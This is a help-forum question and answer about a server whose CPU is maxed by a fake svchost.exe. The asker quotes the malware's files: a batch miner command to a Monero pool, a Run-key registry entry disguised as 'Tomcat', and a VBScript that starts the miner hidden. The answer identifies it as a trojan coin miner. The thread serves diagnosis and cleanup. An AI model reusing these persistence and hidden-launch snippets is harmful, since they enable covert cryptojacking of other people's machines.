SVC Host consumming 99% CPU

Question

Our server is constantly consuming too much CPU, with svchost.exe seems to be the culprit.

See the screenshow below:

File contents of 1.bat:

svchost -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2DqMQ---SomeLongCodeHere---ZFnqXUrf -p x

File contents of pubwin.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Tomcat"="C:\\Windows\\system\\pubwin.vbs"

File content of pubwin.vbs:

dim objShell
set objShell=wscript.createObject("WScript.Shell")
WScript.Sleep(20000)
iReturnCode=objShell.Run("""C:\Windows\system\svchost.exe""  -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2Dq----SomeLongCodeHere---zdLZGeEQqZTZeBLuSNnqXUrf -p x",vbhide)

Should we be worried, or is it really **Tomcat**.

Possible duplicate of [How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?](http://superuser.com/questions/100360/how-can-i-remove-malicious-spyware-malware-adware-viruses-trojans-or-rootkit) — DavidPostill, Oct 05 '15 at 16:46

score 3 · Accepted Answer · answered Oct 05 '15 at 16:12

It's a virus/trojan:

http://www.bleepingcomputer.com/forums/t/571980/trojanagentmnr-bitcoin-miner-running-fake-svchostexe-and-lsassexe/

https://forums.malwarebytes.org/index.php?/topic/125534-cant-remove-bitcoin-miner-and-svchostexe-virus/

https://www.google.co.uk/search?q=svchost.exe+cryptonight

https://www.google.co.uk/search?q=svchost.exe+bitcoin

Many variants of it, its basically a bitcoin mining daemon rebadged to look like part of the system.

SVC Host consumming 99% CPU

1 Answers1